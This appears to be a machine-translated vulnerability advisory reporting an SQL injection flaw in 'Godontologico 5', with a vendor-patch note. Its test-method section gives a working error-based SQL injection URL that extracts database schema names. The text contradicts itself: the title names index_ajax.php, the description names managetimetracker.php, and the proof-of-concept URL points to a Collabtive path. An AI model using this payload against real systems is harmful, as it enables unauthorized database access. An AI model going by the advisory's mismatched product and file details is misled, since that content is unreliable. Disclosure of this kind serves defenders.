Godontologico '/index_ajax.php' SQL Injection Vulnerability

Release date:
Updated on:

Affected Systems:
Sourceforge Godontologico 5
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65093

Godontologico is a software related to clinical research.

Godontologico 5 and other versions do not effectively filter the validity of the internal reference values of managetimetracker. php. in implementation, the SQL injection vulnerability exists. After successful exploitation, unauthorized database operations can be performed.

<* Source: vinicius777

Link: http://www.exploit-db.com/exploits/31141/
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Http://www.example.com/collabtive/managetimetracker.php? Action = projectpdf & amp; id = 2 and (select 1 from (select count (*), concat (select distinct concat (0x7e, 0x27, cast (schema_name as char), 0x27, 0x7e) FROM information_schema.schemata LIMIT 0, 1) from information_schema.tables limit 0, 1), floor (rand (0) * 2 )) x from information_schema.tables group by x) a) and 1 = 1

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Sourceforge
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://sourceforge.net/projects/godontologico? Source = navbar